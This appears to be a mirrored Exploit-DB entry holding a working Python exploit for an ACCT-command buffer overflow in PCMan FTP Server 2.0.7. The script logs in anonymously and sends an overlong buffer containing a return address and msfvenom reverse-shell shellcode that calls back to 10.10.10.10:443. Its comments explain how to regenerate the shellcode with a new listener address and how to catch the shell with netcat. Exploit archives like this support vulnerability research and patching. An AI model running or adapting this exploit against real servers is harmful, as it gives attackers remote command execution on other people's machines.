PCMan FTP Server 2.0.7 – ‘ACCT’ Remote Buffer Overflow

  • 作者: Cybernetic
    日期: 2016-11-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/40704/
  • #!/usr/bin/env python
    #-*- coding: utf-8 -*-
    
    # Exploit Title: PCMan FTP Server 2.0 ACCT Command Buffer Overflow Exploit
    # Date: 3/11/2016
    # Exploit Author: Cybernetic
    # Version: 2.0
    # Tested on: Windows XP Professional SP3 ESP (Spanish) x86
    # CVE : N/A
    
    import socket, os, sys
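    # Overwrite for the saved return address, little-endian. The listing gives
    # only the raw address and module (Shell32.dll 0x7E6B31C7); it is presumably
    # a JMP/CALL ESP-style trampoline into the NOP sled that follows, but the
    # gadget is not stated here -- confirm it in a debugger before relying on it.
    # Windows XP has no ASLR, yet the address is tied to the tested build
    # (Spanish XP Professional SP3, per the header) and will differ on other
    # language or service-pack builds of Shell32.dll.
    ret = b"\xC7\x31\x6B\x7E"  # Shell32.dll 7E6B31C7

    # Metasploit shellcode, generated with:
    #   msfvenom -p windows/shell_reverse_tcp LHOST=10.10.10.10 LPORT=443 -b '\x00\x0a\x0d' -f c
    # It connects BACK to 10.10.10.10:443, so regenerate it with your own LHOST
    # (keep the same bad chars -- NUL and CR/LF would terminate the FTP command)
    # and catch the shell with:  nc -lvp 443
    shellcode = (
        b"\xba\xac\x84\x20\xa3\xda\xc7\xd9\x74\x24\xf4\x5f\x2b\xc9\xb1"
        b"\x52\x31\x57\x12\x83\xc7\x04\x03\xfb\x8a\xc2\x56\xff\x7b\x80"
        b"\x99\xff\x7b\xe5\x10\x1a\x4a\x25\x46\x6f\xfd\x95\x0c\x3d\xf2"
        b"\x5e\x40\xd5\x81\x13\x4d\xda\x22\x99\xab\xd5\xb3\xb2\x88\x74"
        b"\x30\xc9\xdc\x56\x09\x02\x11\x97\x4e\x7f\xd8\xc5\x07\x0b\x4f"
        b"\xf9\x2c\x41\x4c\x72\x7e\x47\xd4\x67\x37\x66\xf5\x36\x43\x31"
        b"\xd5\xb9\x80\x49\x5c\xa1\xc5\x74\x16\x5a\x3d\x02\xa9\x8a\x0f"
        b"\xeb\x06\xf3\xbf\x1e\x56\x34\x07\xc1\x2d\x4c\x7b\x7c\x36\x8b"
        b"\x01\x5a\xb3\x0f\xa1\x29\x63\xeb\x53\xfd\xf2\x78\x5f\x4a\x70"
        b"\x26\x7c\x4d\x55\x5d\x78\xc6\x58\xb1\x08\x9c\x7e\x15\x50\x46"
        b"\x1e\x0c\x3c\x29\x1f\x4e\x9f\x96\x85\x05\x32\xc2\xb7\x44\x5b"
        b"\x27\xfa\x76\x9b\x2f\x8d\x05\xa9\xf0\x25\x81\x81\x79\xe0\x56"
        b"\xe5\x53\x54\xc8\x18\x5c\xa5\xc1\xde\x08\xf5\x79\xf6\x30\x9e"
        b"\x79\xf7\xe4\x31\x29\x57\x57\xf2\x99\x17\x07\x9a\xf3\x97\x78"
        b"\xba\xfc\x7d\x11\x51\x07\x16\xde\x0e\x06\xa1\xb6\x4c\x08\x2c"
        b"\xfc\xd8\xee\x44\x12\x8d\xb9\xf0\x8b\x94\x31\x60\x53\x03\x3c"
        b"\xa2\xdf\xa0\xc1\x6d\x28\xcc\xd1\x1a\xd8\x9b\x8b\x8d\xe7\x31"
        b"\xa3\x52\x75\xde\x33\x1c\x66\x49\x64\x49\x58\x80\xe0\x67\xc3"
        b"\x3a\x16\x7a\x95\x05\x92\xa1\x66\x8b\x1b\x27\xd2\xaf\x0b\xf1"
        b"\xdb\xeb\x7f\xad\x8d\xa5\x29\x0b\x64\x04\x83\xc5\xdb\xce\x43"
        b"\x93\x17\xd1\x15\x9c\x7d\xa7\xf9\x2d\x28\xfe\x06\x81\xbc\xf6"
        b"\x7f\xff\x5c\xf8\xaa\xbb\x6d\xb3\xf6\xea\xe5\x1a\x63\xaf\x6b"
        b"\x9d\x5e\xec\x95\x1e\x6a\x8d\x61\x3e\x1f\x88\x2e\xf8\xcc\xe0"
        b"\x3f\x6d\xf2\x57\x3f\xa4"
    )

    # Request layout (bytes literals throughout so the payload survives Python 3,
    # where a str with \x80+ escapes would be UTF-8 encoded or rejected on send):
    #   OFFSET_TO_RET bytes of 0x41 filler -> ret -> NOP sled -> shellcode ->
    #   0x43 filler padding the stage to exactly PAYLOAD_SLOT bytes.
    # The 2007-byte offset is the value the original author measured on the
    # tested build; it is not re-derived here.
    OFFSET_TO_RET = 2007
    PAYLOAD_SLOT = 696

    shell = b"\x90" * 30 + shellcode
    if len(shell) > PAYLOAD_SLOT:
        # A negative repeat count would silently yield empty padding and change
        # the request length without any warning; fail loudly instead.
        raise ValueError(
            "stage is %d bytes but only %d fit after the return address"
            % (len(shell), PAYLOAD_SLOT)
        )
    buffer = (
        b"\x41" * OFFSET_TO_RET
        + ret
        + shell
        + b"\x43" * (PAYLOAD_SLOT - len(shell))
    )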
    
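    def main(target="10.10.1.10", port=21, timeout=10.0):
        """Log in anonymously and send the oversized ACCT command.

        Args:
            target: FTP server address. Defaults to the lab host the original
                exploit hard-coded; ``sys.argv[1]`` overrides it when the file
                is run as a script.
            port: FTP control port.
            timeout: socket timeout in seconds, so an unreachable or wedged
                host cannot hang the script indefinitely.

        Raises:
            socket.error / OSError if the connection or a send fails.

        The payload is the module-level ``buffer``. Nothing on this connection
        tells us whether the overflow worked -- the only meaningful indicator
        is a callback on the listener matching the shellcode's LHOST/LPORT.
        """
        print("Sending Buffer")
        s = socket.create_connection((target, port), timeout)
        try:
            s.recv(1024)  # banner
            s.sendall(b"USER anonymous\r\n")
            s.recv(1024)
            s.sendall(b"PASS anonymous\r\n")
            s.recv(1024)
            # Deliberately no space between the verb and its argument: the
            # original exploit's 2007-byte offset to the saved return address
            # was measured with this exact framing, so do not "fix" the FTP
            # grammar here. sendall() guarantees the whole ~2.7 KB goes out.
            s.sendall(b"ACCT" + buffer + b"\r\n")
        finally:
            s.close()
        # The old message claimed success; the script can only confirm delivery.
        print("Buffer sent; check the reverse-shell listener for a callback")


    if __name__ == "__main__":
        main(sys.argv[1] if len(sys.argv) > 1 else "10.10.1.10")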